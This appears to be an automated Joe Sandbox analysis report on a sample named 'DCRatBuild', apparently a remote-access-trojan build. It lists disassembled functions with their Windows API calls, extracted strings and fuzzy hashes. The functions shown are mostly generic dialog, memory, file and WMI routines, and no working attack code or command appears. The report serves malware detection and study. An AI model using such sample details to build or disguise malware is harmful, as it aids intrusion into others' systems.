Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: b5b15805dbb77dcc2de3826e16686c489dc7190d48bf41d02bae263241f829a4
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 6F31D5B1A147468FCB54EE14C8511AEBBE0FB95704F50452DE4C9C7742CB38EA0ACB92

Function 0007E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0007E30E

Part of subcall function 00074092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000740A5

Part of subcall function 00081DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,000B1030,?,0007D928,00000000,?,00000050,000B1030), ref: 00081DC4

_strlen.LIBCMT ref: 0007E32F
SetDlgItemTextW.USER32(?,000AE274,?), ref: 0007E38F
GetWindowRect.USER32(?,?), ref: 0007E3C9
GetClientRect.USER32(?,?), ref: 0007E3D5
GetWindowLongW.USER32(?,000000F0), ref: 0007E475
GetWindowRect.USER32(?,?), ref: 0007E4A2
SetWindowTextW.USER32(?,?), ref: 0007E4DB
GetSystemMetrics.USER32(00000008), ref: 0007E4E3
GetWindow.USER32(?,00000005), ref: 0007E4EE
GetWindowRect.USER32(00000000,?), ref: 0007E51B
GetWindow.USER32(00000000,00000002), ref: 0007E58D

Strings

d, xrefs: 0007E3F5
CAPTION, xrefs: 0007E4BD
$%s:, xrefs: 0007E302
t, xrefs: 0007E34A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$t
API String ID: 2407758923-786298865
Opcode ID: 822387da9c52cd2b10bcab7957ac9b984fa6f58e04767f33380bd98c3309d4d0
Instruction ID: 5f7e1807ef7a34d786ac0f79661aa0cef77701153a1fda11a85de95c1328ec01
Opcode Fuzzy Hash: 822387da9c52cd2b10bcab7957ac9b984fa6f58e04767f33380bd98c3309d4d0
Instruction Fuzzy Hash: A581B171609341AFD710DFA8CC88A6FBBE9EBC8704F04492DFA88D7251D639E9058B52

Function 0009CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0009CB66

Part of subcall function 0009C701: _free.LIBCMT ref: 0009C71E
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C730
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C742
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C754
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C766
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C778
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C78A
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C79C
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C7AE
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C7C0
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C7D2
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C7E4
Part of subcall function 0009C701: _free.LIBCMT ref: 0009C7F6

_free.LIBCMT ref: 0009CB5B

Part of subcall function 00098DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0009C896,?,00000000,?,00000000,?,0009C8BD,?,00000007,?,?,0009CCBA,?), ref: 00098DE2
Part of subcall function 00098DCC: GetLastError.KERNEL32(?,?,0009C896,?,00000000,?,00000000,?,0009C8BD,?,00000007,?,?,0009CCBA,?,?), ref: 00098DF4

_free.LIBCMT ref: 0009CB7D
_free.LIBCMT ref: 0009CB92
_free.LIBCMT ref: 0009CB9D
_free.LIBCMT ref: 0009CBBF
_free.LIBCMT ref: 0009CBD2
_free.LIBCMT ref: 0009CBE0
_free.LIBCMT ref: 0009CBEB
_free.LIBCMT ref: 0009CC23
_free.LIBCMT ref: 0009CC2A
_free.LIBCMT ref: 0009CC47
_free.LIBCMT ref: 0009CC5F

Strings

h, xrefs: 0009CC0E

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: h
API String ID: 161543041-2663389753
Opcode ID: 18959d983d2b89b3cd2ed3f1a0d867dfdcadef9e13fc4f90eb33c56a115039c5
Instruction ID: 240464c9c74a8d15e0c20e77724f68d8d8a82c330f249b1f3dd2beb683bb57a7
Opcode Fuzzy Hash: 18959d983d2b89b3cd2ed3f1a0d867dfdcadef9e13fc4f90eb33c56a115039c5
Instruction Fuzzy Hash: DD316D71A013059FFF60AA78D846F9AB7E9EF11310F108429E188D7292DF31EC40EB20

Function 000996F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00099705

Part of subcall function 00098DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0009C896,?,00000000,?,00000000,?,0009C8BD,?,00000007,?,?,0009CCBA,?), ref: 00098DE2
Part of subcall function 00098DCC: GetLastError.KERNEL32(?,?,0009C896,?,00000000,?,00000000,?,0009C8BD,?,00000007,?,?,0009CCBA,?,?), ref: 00098DF4

_free.LIBCMT ref: 00099711
_free.LIBCMT ref: 0009971C
_free.LIBCMT ref: 00099727
_free.LIBCMT ref: 00099732
_free.LIBCMT ref: 0009973D
_free.LIBCMT ref: 00099748
_free.LIBCMT ref: 00099753
_free.LIBCMT ref: 0009975E
_free.LIBCMT ref: 0009976C

Strings

0d, xrefs: 000996FC

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 0d
API String ID: 776569668-980319039
Opcode ID: f2e1fd4dbb2c5ba7fcf84bae245b63b48548caa2cc7464eaffcad1f8b0d2553a
Instruction ID: f1316bb3595f1b1a762984505035a0bac80b85c6a8052f9710c5efee6e5cea91
Opcode Fuzzy Hash: f2e1fd4dbb2c5ba7fcf84bae245b63b48548caa2cc7464eaffcad1f8b0d2553a
Instruction Fuzzy Hash: 8711A276111109AFCF01EF94C882CD93BB5EF19350B5195A5FA488F262DE32EA50EB84

Function 00089711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00089736
_wcslen.LIBCMT ref: 000897D6
GlobalAlloc.KERNEL32(00000040,?), ref: 000897E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00089806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0008982D

Strings

<html>, xrefs: 00089755, 0008978E
</html>, xrefs: 000897B7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00089760
utf-8"></head>, xrefs: 0008976B

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 7032255bfa13bcc4a5a92b0fa83ff6b7cdac124f90db82377531ec2c87911dd2
Instruction ID: 42f3e0c6fd6e83eda6e16e6faef699b4adc66c647da9fc5f5a01343c628165fa
Opcode Fuzzy Hash: 7032255bfa13bcc4a5a92b0fa83ff6b7cdac124f90db82377531ec2c87911dd2
Instruction Fuzzy Hash: 3C31F332508712BBEB25BB749C46FAB7B98AF82310F18011EF541961D3EB649A0583A6

Function 0008D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0008D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 0008D6ED

Part of subcall function 00081FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0007C116,00000000,.exe,?,?,00000800,?,?,?,00088E3C), ref: 00081FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 0008D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0008D720
GetObjectW.GDI32(00000000,00000018,?), ref: 0008D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0008D75D
DeleteObject.GDI32(00000000), ref: 0008D764
GetWindow.USER32(00000000,00000002), ref: 0008D76D

Strings

STATIC, xrefs: 0008D6F3

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 3210e2a803afd6a164a7d39093a50820a71313615412cd4ea669de494ab7d68b
Instruction ID: 3ca7172bf12b3d23614a8c60bcd914ec075768cb5cac59c841b1d8092dc052ff
Opcode Fuzzy Hash: 3210e2a803afd6a164a7d39093a50820a71313615412cd4ea669de494ab7d68b
Instruction Fuzzy Hash: C81102322457117BF2207B70AC4AFAF7B9CBF55711F004223FE91A20D2EA68CA0547B6

Function 00092E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00092F50
___TypeMatch.LIBVCRUNTIME ref: 0009305E
_UnwindNestedFrames.LIBCMT ref: 000931B0
CallUnexpected.LIBVCRUNTIME ref: 000931CB
_abort.LIBCMT ref: 000931D0

Strings

csm, xrefs: 00092EDB
csm, xrefs: 00092E6E
csm, xrefs: 00092F87

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 681fddeb47b496386551a0144a31c486e9d266dfffcd39f5dba11477a6948937
Instruction ID: 91862c3ff293d2f466f198221c74ac6dcf29d5c0f111574902b0722b43739d89
Opcode Fuzzy Hash: 681fddeb47b496386551a0144a31c486e9d266dfffcd39f5dba11477a6948937
Instruction Fuzzy Hash: 74B17A71800209EFCF29DFA4C8819AEBBB5FF44310F15416AF8156B262D735EA51EF92

Function 00076FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00076FAA
_wcslen.LIBCMT ref: 00077013
_wcslen.LIBCMT ref: 00077084

Part of subcall function 00077A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00077AAB
Part of subcall function 00077A9C: GetLastError.KERNEL32 ref: 00077AF1
Part of subcall function 00077A9C: CloseHandle.KERNEL32(?), ref: 00077B00

Strings

SeRestorePrivilege, xrefs: 00076FC2
UNC\, xrefs: 00077051
SeCreateSymbolicLinkPrivilege, xrefs: 00076FCC
\??\, xrefs: 0007702B

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: c7609f6283249026fb9fe202253302307ca54d6627cbd15546ab919ac00b8287
Instruction ID: c42016b36c9ee86e5029974e72ba26d8cfe2aa2b855ba64be61ed17ecfa74ef7
Opcode Fuzzy Hash: c7609f6283249026fb9fe202253302307ca54d6627cbd15546ab919ac00b8287
Instruction Fuzzy Hash: E34129B1D08344BAEF30E7748C82FEE73AC9F45384F008455FA4DA6183D67CAA848B65

Function 0008B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00071316: GetDlgItem.USER32(00000000,00003021), ref: 0007135A
Part of subcall function 00071316: SetWindowTextW.USER32(00000000,000A35F4), ref: 00071370

EndDialog.USER32(?,00000001), ref: 0008B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 0008B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0008B650
SetWindowTextW.USER32(?,?), ref: 0008B661
GetDlgItem.USER32(?,00000065), ref: 0008B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0008B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0008B694

Strings

LICENSEDLG, xrefs: 0008B5D4

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 47a4d12b48d341bbd9df3b57fdd33558709f6be892af81461cb0c37cb4b26610
Instruction ID: 319467dfa587a80d996aa2654f8c0945d72209802b5d810efeab6295525408a4
Opcode Fuzzy Hash: 47a4d12b48d341bbd9df3b57fdd33558709f6be892af81461cb0c37cb4b26610
Instruction Fuzzy Hash: 7321E731601205BBF2217F65ED4AF7B3FADFB46741F054015FA40A50E1EB5E9A119732

Function 0008FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,40137527,00000001,00000000,00000000,?,?,0007AF6C,ROOT\CIMV2), ref: 0008FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0007AF6C,ROOT\CIMV2), ref: 0008FE14
SysAllocString.OLEAUT32(00000000), ref: 0008FE1F
_com_issue_error.COMSUPP ref: 0008FE48
_com_issue_error.COMSUPP ref: 0008FE52
GetLastError.KERNEL32(80070057,40137527,00000001,00000000,00000000,?,?,0007AF6C,ROOT\CIMV2), ref: 0008FE57
_com_issue_error.COMSUPP ref: 0008FE6A
GetLastError.KERNEL32(00000000,?,?,0007AF6C,ROOT\CIMV2), ref: 0008FE80
_com_issue_error.COMSUPP ref: 0008FE93

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: d5e34a7cf5ec48222b7a66ed66874f215ebe6e4a6cae4f930ec48d1d5edb13bf
Instruction ID: c64c06a62ef57ec923b115239e7f9900ae7fe4a09baddfcfb46190c2d92343f4
Opcode Fuzzy Hash: d5e34a7cf5ec48222b7a66ed66874f215ebe6e4a6cae4f930ec48d1d5edb13bf
Instruction Fuzzy Hash: A441D871A00616ABDB10AF78CC45BFEBBE9FB45710F104239F955E7292DB7499008BA4

Function 0007AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0007AF29

Strings

Windows 10, xrefs: 0007B0C2
SELECT * FROM Win32_OperatingSystem, xrefs: 0007AFCA
Name, xrefs: 0007B0B0
WQL, xrefs: 0007AFDC
ROOT\CIMV2, xrefs: 0007AF5C

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 0cc442dba983a4c499c6e0f0d934a7570419b9e119c355efb883ba0f3054fd81
Instruction ID: 29d8c5b65de375e99aed15f2f5b0d32c1c8a43551e524b26986b6650a8eed9cb
Opcode Fuzzy Hash: 0cc442dba983a4c499c6e0f0d934a7570419b9e119c355efb883ba0f3054fd81
Instruction Fuzzy Hash: 28716E70F00619AFEB14DFA4CC95AAEB7B9FF89710B144159F516A72A0CB38AD01CB60

Function 00079382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00079387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 000793AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 000793C9

Part of subcall function 0007C29A: _wcslen.LIBCMT ref: 0007C2A2

Part of subcall function 00081FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0007C116,00000000,.exe,?,?,00000800,?,?,?,00088E3C), ref: 00081FD1

_swprintf.LIBCMT ref: 00079465

Part of subcall function 00074092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000740A5

MoveFileW.KERNEL32(?,?), ref: 000794D4
MoveFileW.KERNEL32(?,?), ref: 00079514

Strings

rtmp%d, xrefs: 0007944E

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: f63b674ad40ef61af2307025e01f950e0774263910bfbe05713d7dfe839776cc
Instruction ID: b7865c6738d32ce58b5cfa2f39a73b1f0bac7f977a883e118edac26ab545f80b
Opcode Fuzzy Hash: f63b674ad40ef61af2307025e01f950e0774263910bfbe05713d7dfe839776cc
Instruction Fuzzy Hash: 09412471D0066466DF61ABA0CC55DDE737CAF45380F0088A5B64DE3053DA3C9BC98B68

Function 00081218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0008122E

Part of subcall function 0007B146: GetVersionExW.KERNEL32(?), ref: 0007B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00081251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00081263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00081274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00081284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00081294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000812CF
__aullrem.LIBCMT ref: 00081379

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 17f845fcd791ad9a5ae296d74341fed1ee1e61697affcdcfe9dcd548e31c2d65
Instruction ID: aba5168d4b6ed8a8e9066a84c32683a736835c037178ad7eb45914b210f1fbf9
Opcode Fuzzy Hash: 17f845fcd791ad9a5ae296d74341fed1ee1e61697affcdcfe9dcd548e31c2d65
Instruction Fuzzy Hash: 194105B1508305AFD754EF65C8849ABBBE9FF88314F00892EF5D6C2210E738E649CB52

Function 00072210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00072536

Part of subcall function 00074092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000740A5

Part of subcall function 000805DA: _wcslen.LIBCMT ref: 000805E0

Strings

;%u, xrefs: 00072523
x%u, xrefs: 000726FD
xc%u, xrefs: 0007275A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

